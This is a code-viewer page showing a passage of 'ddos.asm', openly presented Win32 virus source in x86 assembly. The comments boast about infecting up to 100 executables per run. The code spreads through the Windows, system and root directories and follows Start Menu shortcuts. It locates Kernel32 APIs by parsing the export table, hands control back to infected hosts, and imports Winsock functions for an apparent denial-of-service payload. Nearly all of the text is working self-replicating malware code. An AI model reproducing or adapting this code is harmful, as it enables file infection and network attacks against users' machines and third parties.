📄 ddos.asm
字号:
call InfectCurDir
; we save both directory's in the same buffer
push 7Fh ; so we save 127 Bytes of the Buffersize
lea edi, [ebp+windir]
push edi
call dword ptr [ebp+XGetSystemDirectoryA]
lea edi, [ebp+windir] ; and the system directory ..
push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
call InfectCurDir
; if everything went fine, we have
; infected now up to 30 files !
; Is this enough ?
; ( please note that this is a rhetorical question *g* )
; We want more !
; ***************************************************************************
; -----------------------[ Parse Directory's ]-------------------------------
; ***************************************************************************
InitParsing:
mov [ebp+InfCounter], 30d ; let's parse some directorys for
; 30 more files !
lea edi, [ebp+RootDir]
call dword ptr [ebp+XSetCurrentDirectoryA]
call ParseFolder
; if we are not able to access the registry we
; infect another 20 Files in the System-Directory
cmp dword ptr [ebp+XRegOpenKeyExA], 0h
je InfectWinDirAgain
call GetStartMenue ; last but not least, we try to parse the
; start-menue folder ( follow the LNK's )
; to get 20 more files
; with some luck, we infect 100 files each run
; all over the HD *g*
; I think this can be called successfull spreading *g*
lea edi, [ebp+windir]
call dword ptr [ebp+XSetCurrentDirectoryA]
InfectWinDirAgain:
mov [ebp+InfCounter], 20d
call ParseFolder ; let's parse the startmenue and follow all
; LNK-Files inside ;)
jmp PayLoad ; start the evil part of this thingie ..
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0
jbe EndParsing ; we infected enough ? ok, leave !
lea esi, [ebp+Folders]
Call FindFirstFileProc
inc eax
jz EndParsing ; If there are no directorys we return
dec eax ; otherwise we save the handle
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
lea esi, [ebp+WFD_szFileName]
cmp byte ptr [esi], '.' ; we will not parse into . or ..
je NoThisOne ; directorys
push 03h
pop ecx
call GetRand
dec edx ; if division-rest (edx) = 1
jz ParseNewDir ; we get this directory
NoThisOne:
call FindNextFileProc
test eax, eax
jnz GetOtherDir
EndParseDir2: ; we close the search - Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
EndParsing: ; we just return
ret
ParseNewDir: ; we got a direcory, let's change to it
; and infect it.. *eg*
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
lea esi, [ebp+WFD_szFileName]
push esi
call dword ptr [ebp+XSetCurrentDirectoryA]
jmp ParseFolder
; ***************************************************************************
; -----------------[ Let's get the Startmenue folder ]-----------------------
; ***************************************************************************
GetStartMenue: ; Let's try to open HKEY_USERS registry Key
lea esi, [ebp+RegHandle]
push esi
push 001F0000h ; complete access
push 0h ; reserved
lea esi, [ebp+SubKey]
push esi
push 80000003h ; HKEY_USERS
call dword ptr [ebp+XRegOpenKeyExA]
test eax, eax ; if we failed opening the key, we return
jnz NoStartMenue
; let's get the value
lea esi, [ebp+BufferSize]
push esi
lea esi, [ebp+windir]
push esi
lea esi, [ebp+ValueType]
push esi ; Type of Value
push 0 ; reserved
lea esi, [ebp+Value]
push esi ; ValueName
mov eax, [ebp+RegHandle]
push eax ; Reg-Key Handle
call dword ptr [ebp+XRegQueryValueExA]
mov eax, dword ptr [ebp+RegHandle]
push eax
call dword ptr [ebp+XRegCloseKey]
NoStartMenue:
ret
SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Value db 'Start Menu',0
ValueType dd 0h ; Type of registry Value
BufferSize dd 7Fh ; size of buffer
; ***************************************************************************
; ----------------[ API - Tables and some other data ]-----------------------
; ***************************************************************************
; Misc Data .. ;)
Folders db '*.',0 ; search for directory's
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:
; Here follow the tables of the api's we use
; for our virus, if you want to know what they
; do exactly simply check the Win32
; Programmer's Reference
; I won't explain them ( I think the names of them
; makes it clear enough *g* )
Kernel32Names: ; 17d API's we want from Kernel32.dll
NumberOfKernel32APIS equ 17d
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'SetFileAttributesA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetWindowsDirectoryA', 0
db 'GetSystemDirectoryA', 0
db 'GetCurrentDirectoryA', 0
db 'SetCurrentDirectoryA', 0
db 'GetFileAttributesA', 0
db 'GetTickCount', 0
db 'CreateThread',0
db 'GetSystemTime',0
ImageHLPNames:
db 'CheckSumMappedFile', 0h
ADVAPI32Names:
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0
WSOCK32Names:
db 'socket',0
db 'WSACleanup',0
db 'WSAStartup',0
db 'closesocket',0
db 'sendto',0
db 'setsockopt',0
; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************
; esi points to the Table of Names
; edi to the offsets
; ebx contains the module-handle
; ecx the number of API's
GetAPI3:
push ecx ; save ecx
push esi ; push api-name
push ebx ; Push Module-Handle
; call GetProcAddress
call dword ptr [ebp+XGetProcAddress]
stosd ; store api-offset
pop ecx ; did we get them all ?
dec ecx
jz EndApi3 ; if yes then return
push ecx ; otherwise move esi to next API-Name
SearchZero: ; we search for the end of the current
cmp byte ptr [esi], 0h
je GotZero ; api name ( always 0h ) and increase
inc esi
jmp SearchZero
GotZero:
inc esi
pop ecx ; get ecx ( counter )
jmp GetAPI3 ; retrieve Next API
EndApi3:
ret
; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************
SearchAPI1: ; In this procedure we search for the first 2 API's
; clear the counter
and word ptr [ebp+counter], 0h
mov eax, [ebp+KernelAddy] ; Load the PE-Header Offset
mov esi, [eax+78h] ; Get Export Table Address
add esi, [ebp+MZAddy] ; normalize RVA
add esi, 1Ch ; skip not needed data
; now we gave the Address Table RVA-Offset in esi
lodsd ; Get Address Table RVA
add eax, [ebp+MZAddy] ; convert to VA and save it
mov dword ptr [ebp+ATableVA], eax
lodsd ; Get Name Pointer Table RVA
add eax, [ebp+MZAddy] ; make it VA and save it
mov dword ptr [ebp+NTableVA], eax
lodsd ; Get Ordinal Table RVA
add eax, [ebp+MZAddy] ; guess what ? *g*
mov dword ptr [ebp+OTableVA], eax
mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi
SearchNextApi1:
push esi ; Save Pointer Table
lodsd
add eax, [ebp+MZAddy] ; make it VA
mov esi, eax ; API Name in the Kernel Export API
mov edi, edx ; API we are looking for
push ecx ; save the size
cld ; Clear direction Flag
rep cmpsb ; Compare it
pop ecx
jz FoundApi1 ; Are they equal ?
pop esi ; Get the Pointer Table
add esi, 4h ; Set Pointer to the next api
inc word ptr [ebp+counter]
cmp word ptr [ebp+counter], 2000h
je NotFoundApi1
jmp SearchNextApi1 ; test next API
FoundApi1:
pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )
movzx eax, word ptr [ebp+counter]
shl eax, 1h ; multiply eax with 2
; Make eax Point to the right entry inside the
; Ordinal Table
add eax, dword ptr [ebp+OTableVA]
xor esi, esi ; clear esi
xchg eax, esi ; make esi point to the entry
lodsw ; get Ordinal in AX
shl eax, 2h ; eax * 4
add eax, dword ptr [ebp+ATableVA]
mov esi, eax ; esi points to the address RVA
lodsd ; eax = address RVA
add eax, [ebp+MZAddy] ; Make it VA
ret ; Return with API-Addy in eax
NotFoundApi1:
xor eax, eax ; We didn't find the API we need :(
ret ; We set EAX to 0 to show we have to
; return to the host..
; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************
ExecuteHost: ; Here we execute the original program
lea edi, [ebp+curdir] ; we return to the original directory..
push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
or ebp, ebp ; if this is a virus of the first generation
jz FirstGenHost ; we can't return to a host, so we
; stop this with ExitProcess..
Error_ExecuteHost:
mov eax, dword ptr [ebp+SEH_Save]
push eax
mov fs:[0], esp
mov eax,12345678h ; here we return to
org $-4 ; the old entry point
retEIP dd 0h ; of the infected file
add eax,12345678h
org $-4
retBas dd 0h
jmp eax
FirstGenHost:
push 0h ; Stop executing this stuff ( first Generation
call ExitProcess ; only )
OldEIP dd 0h ; Old Entry Point
OldBase dd 0h ; Old Imagebase
NewEIP dd 0h ; New Entry Point ( points to our virus.. )
; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************
GetKernel: ; Here we try to retrieve the Kernel
; set search range
mov byte ptr [ebp+K32Trys], 5h
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; Did we pass our limit of 50 pages ?
call CheckMZSign ; Has this Page a DOS EXE-Header ?
jnc CheckPE
GK2:
sub esi, 10000h ; Get the next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; Check it
CheckPE: ; Let's check if we really found
mov edi, [esi+3Ch] ; the Kernel32.dll PE-Header
add edi, esi
call CheckPESign ; check for PE-Sign
jnc CheckDLL ; check for the DLL-Flag
jmp GK2
CheckDLL:
add edi, 16h ; check for the Dll-Flag
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
jne GK2 ; if it is no dll go on searching
KernelFound: ; we found the Kernel32.dll
sub edi, 16h ; set edi to the PE - Header
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -